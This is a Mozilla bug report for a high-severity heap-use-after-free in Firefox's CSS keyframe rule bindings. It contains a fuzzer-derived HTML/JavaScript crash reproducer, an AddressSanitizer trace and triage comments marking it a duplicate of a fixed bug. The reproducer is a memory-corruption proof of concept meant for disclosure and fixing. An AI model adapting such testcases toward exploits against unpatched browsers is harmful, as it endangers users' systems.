Bug 1411936
Opened 8 years ago
Closed 8 years ago
heap-use-after-free in mozilla::dom::CSSKeyframeRuleBinding::_objectMoved
(Core :: DOM: CSS Object Model, defect)
RESOLVED
DUPLICATE
of bug 1410808
(Reporter: nils, Unassigned)
(Keywords: csectype-uaf, sec-high)
The following testcase crashes the latest ASAN build of Firefox (BuildID=20171025222259). The testcase was a bit tricky to minimise, and while some parts of it don't seem necessary they are required for somewhat reliable reproduction of the crash. The testcase is still a little unreliable and might take a few seconds to trigger. Loading the testcase in multiple tabs helps.
crash.html:
<html>
<head>
<script>
// Fuzzer-minimised reproducer (see the description above). The reporter
// notes the crash is timing-dependent and that statements which look
// irrelevant are still needed for reliable reproduction, so nothing here
// has been reordered or removed.
function start() {
// resume() returns a promise; fun0 is passed as the second argument to
// then(), i.e. as the rejection handler, so the rule-list walk in fun0 runs
// later as a promise reaction job (the ASAN allocation stack shows it under
// PromiseReactionJob).
o11=new AudioContext('balanced');
new AbortController();
o27=o11.resume();
o27.then(function() {return false},fun0);
try{new DOMParser().parseFromString("<style> </style>",'text/html').getElementsByTagName('style')[0].sheet.rules[0];}catch(e){}
try{new DOMParser().parseFromString('<style>.class1','text/html').getElementsByTagName('style')[0].sheet.rules[0];}catch(e){}
window.top.document.documentElement.style.zoom='1';
try{new DOMParser().parseFromString('<style>isindex','text/html').getElementsByTagName('style')[0].sheet.rules[0];}catch(e){}
o248=document.documentElement.ownerDocument;
o248.head;
// document.write() replaces the whole document while the script keeps
// references into it; the style elements below are then appended to the
// new documentElement.
o248.write('<html><body><div></div><div></div></body></html>');
document.createRange();
o271=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o271);
document.createRange();
o274=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o274);
o275=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o275);
o276=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o276);
o278=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o278);
document.createRange();
o283=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o283);
o284=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o284);
o285=o248.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o285);
o287=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o287);
o289=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o289);
o290=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o290);
document.documentElement.style.animationDuration='0.05s';
o291=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o291);
document.createRange();
o293=document.createElementNS('http://www.w3.org/1999/xhtml','style');
// Unterminated @keyframes block with a single "from" keyframe. The native
// CSSKeyframeRule created for that keyframe is the object the ASAN report
// shows being freed and then read.
o293.textContent='@keyframes key8{ from{}';
document.documentElement.appendChild(o293);
document.documentElement.classList.toggle('class2');
document.documentElement.appendChild(document.createTextNode("x"));
// o328 is the sheet's CSSRuleList; o328[0] (the @keyframes rule) is read
// later in fun0.
o327=o293.sheet;
o328=o327.cssRules;
document.createRange();
try{new DOMParser().parseFromString('<style tab-size=1>','text/html').getElementsByTagName('style')[0].sheet.rules[0];}catch(e){}
new BroadcastChannel('channel');
document.createElementNS('http://www.w3.org/1999/xhtml','style');
}
function fun0() {
// Walk from the stylesheet's rule list down to the keyframe rule's style
// declaration. The ASAN "previously allocated" stack (CSSRuleListBinding
// get -> ServoKeyframeList::GetRule) appears to correspond to the indexed
// access o460[0] below, i.e. this is where the native CSSKeyframeRule and
// its JS wrapper come into existence.
o432=o328[0];
o460=o432.cssRules;
o515=o460[0];
o777=o515.style;
// Comment 2 singles out these parentRule calls as the trigger shared with
// bug 1410808. Per the ASAN report the native rule is later freed by the
// cycle collector's deferred deletion (SnowWhiteKiller) while its JS wrapper
// is still alive; when a compacting GC slice then moves that wrapper,
// CSSKeyframeRuleBinding::_objectMoved -> UpdateWrapper reads 16 bytes into
// the freed 96-byte allocation.
o777.parentRule;
o777.parentRule;
}
</script>
</head>
<body onload="start()"></body>
</html>
ASAN output:
=================================================================
==28260==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800009e730 at pc 0x7fcc0bdee426 bp 0x7fffefb277a0 sp 0x7fffefb27798
READ of size 8 at 0x60800009e730 thread T0 (file:// Content)
#0 0x7fcc0bdee425 in UpdateWrapper /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:189:9
#1 0x7fcc0bdee425 in UpdateWrapper<mozilla::dom::CSSKeyframeRule> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/BindingUtils.h:1527
#2 0x7fcc0bdee425 in mozilla::dom::CSSKeyframeRuleBinding::_objectMoved(JSObject*, JSObject*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSKeyframeRuleBinding.cpp:139
#3 0x7fcc144abdbf in RelocateCell /builds/worker/workspace/build/src/js/src/jsgc.cpp:2143:13
#4 0x7fcc144abdbf in RelocateArena /builds/worker/workspace/build/src/js/src/jsgc.cpp:2173
#5 0x7fcc144abdbf in js::gc::ArenaList::relocateArenas(js::gc::Arena*, js::gc::Arena*, js::SliceBudget&, js::gcstats::Statistics&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:2213
#6 0x7fcc144acd42 in js::gc::ArenaLists::relocateArenas(JS::Zone*, js::gc::Arena*&, JS::gcreason::Reason, js::SliceBudget&, js::gcstats::Statistics&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:2278:39
#7 0x7fcc144ad050 in js::gc::GCRuntime::relocateArenas(JS::Zone*, JS::gcreason::Reason, js::gc::Arena*&, js::SliceBudget&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:2297:23
#8 0x7fcc144e8949 in js::gc::GCRuntime::compactPhase(JS::gcreason::Reason, js::SliceBudget&, js::AutoLockForExclusiveAccess&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:6528:13
#9 0x7fcc144ece75 in js::gc::GCRuntime::incrementalCollectSlice(js::SliceBudget&, JS::gcreason::Reason, js::AutoLockForExclusiveAccess&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:7006:17
#10 0x7fcc144efb4b in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget&, JS::gcreason::Reason) /builds/worker/workspace/build/src/js/src/jsgc.cpp:7307:5
#11 0x7fcc144f3282 in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::gcreason::Reason) /builds/worker/workspace/build/src/js/src/jsgc.cpp:7450:25
#12 0x7fcc144fae87 in gcSlice /builds/worker/workspace/build/src/js/src/jsgc.cpp:7536:5
#13 0x7fcc144fae87 in JS::IncrementalGCSlice(JSContext*, JS::gcreason::Reason, long) /builds/worker/workspace/build/src/js/src/jsgc.cpp:8448
#14 0x7fcc0b9338ba in nsJSContext::GarbageCollectNow(JS::gcreason::Reason, nsJSContext::IsIncremental, nsJSContext::IsShrinking, long) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1199:5
#15 0x7fcc0b93dd7b in InterSliceGCRunnerFired(mozilla::TimeStamp, void*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1804:3
#16 0x7fcc0b95cec0 in operator() /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:2361:20
#17 0x7fcc0b95cec0 in std::_Function_handler<bool (mozilla::TimeStamp), DOMGCSliceCallback(JSContext*, JS::GCProgress, JS::GCDescription const&)::$_6>::_M_invoke(std::_Any_data const&, mozilla::TimeStamp) /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.9.4/../../../../include/c++/4.9.4/functional:2024
#18 0x7fcc08a3499d in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.9.4/../../../../include/c++/4.9.4/functional:2440:14
#19 0x7fcc08a3499d in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:62
#20 0x7fcc08a73d86 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
#21 0x7fcc08a8e248 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#22 0x7fcc0985efb1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#23 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#24 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#25 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#26 0x7fcc0f1c9adf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#27 0x7fcc136f9cc7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
#28 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#29 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#30 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#31 0x7fcc136f967a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
#32 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#33 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
#34 0x7fcc2637682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#35 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)
0x60800009e730 is located 16 bytes inside of 96-byte region [0x60800009e720,0x60800009e780)
freed by thread T0 (file:// Content) here:
#0 0x4bc0fb in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7fcc0890cc07 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
#2 0x7fcc089172e4 in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
#3 0x7fcc089172e4 in nsCycleCollector_doDeferredDeletion() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4293
#4 0x7fcc0a24ef63 in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:124:34
#5 0x7fcc08a9537f in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:339:22
#6 0x7fcc08a73d86 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
#7 0x7fcc08a8e248 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#8 0x7fcc0985efb1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#9 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#10 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#11 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#12 0x7fcc0f1c9adf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#13 0x7fcc136f9cc7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
#14 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#15 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#16 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#17 0x7fcc136f967a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
#18 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#19 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
#20 0x7fcc2637682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T0 (file:// Content) here:
#0 0x4bc44c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
#2 0x7fcc0f5a5632 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
#3 0x7fcc0f5a5632 in mozilla::ServoKeyframeList::GetRule(unsigned int) /builds/worker/workspace/build/src/layout/style/ServoKeyframesRule.cpp:61
#4 0x7fcc0c646f8b in mozilla::dom::CSSRuleListBinding::DOMProxyHandler::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSRuleListBinding.cpp:392:58
#5 0x7fcc146712e0 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:353:21
#6 0x7fcc146712e0 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
#7 0x7fcc146958fb in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1600:16
#8 0x7fcc146958fb in js::ForwardingProxyHandler::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:153
#9 0x7fcc14648db8 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
#10 0x7fcc146712e0 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:353:21
#11 0x7fcc146712e0 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
#12 0x7fcc13994ba0 in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1600:16
#13 0x7fcc13994ba0 in GetElement /builds/worker/workspace/build/src/js/src/jsobjinlines.h:230
#14 0x7fcc13994ba0 in GetObjectElementOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:499
#15 0x7fcc13994ba0 in GetElementOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:627
#16 0x7fcc13994ba0 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2905
#17 0x7fcc1397af9a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
#18 0x7fcc139a873f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
#19 0x7fcc139a9632 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
#20 0x7fcc13b6c0db in PromiseReactionJob(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Promise.cpp:1238:14
#21 0x7fcc139a8640 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#22 0x7fcc139a8640 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#23 0x7fcc139a9632 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
#24 0x7fcc143ee15b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
#25 0x7fcc0c16888a in mozilla::dom::PromiseJobCallback::Call(JSContext*, JS::Handle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/PromiseBinding.cpp:21:8
#26 0x7fcc088f9818 in Call /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PromiseBinding.h:89:12
#27 0x7fcc088f9818 in Call /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PromiseBinding.h:104
#28 0x7fcc088f9818 in mozilla::PromiseJobRunnable::Run() /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:212
#29 0x7fcc0ec306ff in mozilla::dom::Promise::PerformMicroTaskCheckpoint() /builds/worker/workspace/build/src/dom/promise/Promise.cpp:531:29
#30 0x7fcc088e1200 in mozilla::CycleCollectedJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:365:7
#31 0x7fcc0a20345d in XPCJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:1207:30
#32 0x7fcc08a743cf in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1053:24
#33 0x7fcc08a8e248 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#34 0x7fcc0985efb1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#35 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#36 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#37 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#38 0x7fcc0f1c9adf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#39 0x7fcc136f9cc7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
#40 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#41 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#42 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#43 0x7fcc136f967a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
#44 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#45 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:189:9 in UpdateWrapper
Shadow bytes around the buggy address:
0x0c108000bc90: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c108000bca0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c108000bcb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c108000bcc0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c108000bcd0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c108000bce0: fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c108000bcf0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c108000bd00: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c108000bd10: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c108000bd20: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c108000bd30: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==28260==ABORTING
Updated•8 years ago
Group: core-security → layout-core-security
Summary: heap-use-after-free in mozilla::dom::CSSKeyframeRuleBinding::_objectMoved → heap-use-after-free in mozilla::dom::CSSKeyframeRuleBinding::_objectMoved
Updated•8 years ago
Keywords: csectype-uaf,
sec-high
Comment 2•8 years ago
Smells a lot like bug 1410808, for the parentRule calls.
Comment 3•8 years ago
And doesn't crash on nightly, so I think it's indeed the same bug.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Comment 4•8 years ago
Well, I didn't read that it was hard to repro, let me try a bit more before duping it...
Status: RESOLVED → REOPENED
Resolution: DUPLICATE → ---
Comment 5•8 years ago
I can reproduce the crash in rev 4d5c0c5017c7, but not in rev d44c182148c2,
using a local ASAN Opt build on Linux.
So it appears this was indeed fixed by bug 1410808 (the crash is present before its landing and gone after), and this bug is resolved as a duplicate on that basis.
Status: REOPENED → RESOLVED
Closed: 8 years ago → 8 years ago
Resolution: --- → DUPLICATE
Updated•5 years ago
Group: layout-core-security